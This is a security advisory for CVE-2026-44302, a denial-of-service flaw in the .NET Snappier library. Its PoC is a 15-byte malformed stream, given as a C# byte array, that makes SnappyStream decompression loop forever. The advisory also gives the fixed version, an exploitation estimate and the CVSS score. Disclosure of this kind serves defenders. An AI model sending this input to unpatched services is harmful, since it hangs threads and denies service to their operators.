CVE-2026-44302
Snappier has an infinite loop during SnappyStream decompression with malformed framed input
Description
### Summary `Snappier.SnappyStream` enters an uncatchable infinite loop when decompressing a malformed framed-format Snappy stream as small as 15 bytes. ### Details The hang manifests as a userspace busy loop with SnappyStreamDecompressor.Decompress repeatedly calling Crc32CAlgorithm.Append. The exact non-terminating loop in or above Decompress has not been traced further. ### PoC ```csharp using System.IO.Compression; using Snappier; byte[] data = { 0x00, 0x04, 0x00, 0x00, 0x64, 0x4e, 0x6c, 0x71, 0x79, 0x20, 0x77, 0x6f, 0x72, 0x6c, 0x64 }; using var src = new MemoryStream(data); using var snap = new SnappyStream(src, CompressionMode.Decompress); using var dst = new MemoryStream(); snap.CopyTo(dst); // never returns ``` ### Impact A caller using `SnappyStream` on attacker-controlled bytes can be made to spin forever and burn a thread until the process is killed. `try/catch` around the stream operation can't recover (no exception is thrown).
How to fix CVE-2026-44302
To remediate CVE-2026-44302, upgrade the affected package to a fixed version below.
- —upgrade to 1.3.1 or later
Is CVE-2026-44302 being exploited?
Low — EPSS is 0.1%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- from 0, < 1.3.1
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH7.5 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |